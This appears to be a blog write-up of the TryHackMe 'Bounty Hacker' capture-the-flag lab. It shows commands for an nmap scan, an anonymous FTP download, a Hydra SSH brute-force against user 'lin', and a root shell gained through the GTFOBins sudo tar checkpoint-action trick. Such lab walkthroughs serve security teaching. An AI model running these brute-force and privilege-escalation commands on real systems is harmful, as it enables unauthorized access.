Bounty Hacker writeup [thm]
![Bounty Hacker CTF Bounty Hacker](../../images/bountyhacker.jpg)
You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!
You were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they'd take you up on claims! Prove your status is more than just a few glasses at the bar. I sense bell peppers & beef in your future!
Bounty Hacker is yet another simple beginner-friendly challenge from THM. Let's get right to it.
Find open ports on the machine
We run a nmap scan against the server:
$: nmap -A $target Host is up (0.048s latency). Not shown: 967 filtered ports, 30 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | Can't get directory listing: TIMEOUT | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.9.5.219 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 4 | vsFTPd 3.0.3 - secure, fast, stable |End of status 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 | (Ubuntu Linux; protocol 2.0) |ssh-hostkey: | 2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA) | 256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA) | 256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |http-server-header: Apache/2.4.18 (Ubuntu) |http-title: Site doesn't have a title (text/html). Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
So we have FTP, SSH and a web server to play with. We start out by checking out the web server. It's well worth a look but nothing of interest is to be found there.
Who wrote the task list?
What task list? There's no task list that I could find on the website so let's try the FTP server. According to the nmap scan it allows anonymous login.
$: ftp $target Connected to $target. 220 (vsFTPd 3.0.3) Name ($target:[REDACTED]): anonymous 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-rw-r-- 1 ftp ftp 418 Jun 07 2020 locks.txt -rw-rw-r-- 1 ftp ftp 68 Jun 07 2020 task.txt
We found the task list. Download both files locks.txt and task.txt.
task.txt:
1.) Protect Vicious. 2.) Plan for Red Eye pickup on the moon. -lin
So we have a good candidate for a username we can use in later attacks.
What service can you bruteforce with the text file found?
Clearly it's SSH.
What is the users password?
The contents of locks.txt looks like it maybe could be passwords. So we have a list of 26 passwords to try in combination with the username lin. We could do it manually but we let Hydra do the heavy lifting for us.
$: hydra -V -l lin -P locks.txt $target -t 4 ssh [22][ssh] host: $target login: lin password: [REDACTED] 1 of 1 target successfully completed, 1 valid password found
Yay, it worked, we have a password!
user.txt
We can now SSH into the server using the password obtained from Hydra.
$: ssh lin@$target lin@bountyhacker:~/Desktop$ cat user.txt [REDACTED]
root.txt
Time for some privilege escalation. We try the old trick of looking for files with SETUID permissions:
lin@bountyhacker:~/.config$ find / -user root -perm /4000 2>/dev/null /usr/sbin/pppd /usr/bin/chfn /usr/bin/passwd /usr/bin/chsh /usr/bin/gpasswd /usr/bin/pkexec /usr/bin/newgrp /usr/bin/sudo /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/eject/dmcrypt-get-device /usr/lib/xorg/Xorg.wrap /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox /usr/lib/snapd/snap-confine /bin/fusermount /bin/su /bin/mount /bin/ping /bin/ping6 /bin/umount
Alright, nothing looks out of the ordinary and all of the candidates for privilege escalation are properly locked down.
What programs, if any, are we allowed to run as root?
lin@bountyhacker:~/Desktop$ sudo -l [sudo] password for lin: Matching Defaults entries for lin on bountyhacker: env_reset, mail_badpass, secure_path=/usr/local/sbin\: /usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User lin may run the following commands on bountyhacker: (root) /bin/tar
We can run tar as root!
Sudo (tar) If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
- GTFOBins
By running:
$: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
We got r00t.
$: whoami root $: cd /root $: cat root.txt [REDACTED]
Feels damn good to be a Elite Bounty Hacker.
Conclusion
Bounty Hacker is an OK beginner challenge following the typical nmap -> get some info -> hydra -> shell -> privesc route. The privesc took me a few minutes to get right but besides from that it almost felt a bit too easy but I think it's good practice nevertheless even though it wasn't very challenging.
One improvement is that I'm getting better at keeping markdown notes of what I'm doing every step of the way. These notes are verbose and also includes things that didn't work and why they didn't work. If I don't finish a challenge in one sitting it get's a whole lot easier to get back in to it at a later time.
Doing public writeups also becomes less of a hassle, I pretty much delete all of the irrelevant parts and add some comments if necessary.
It's a good little challenge. It's probably more fun if you are a complete beginner and never seen Hydra or GTFOBins before.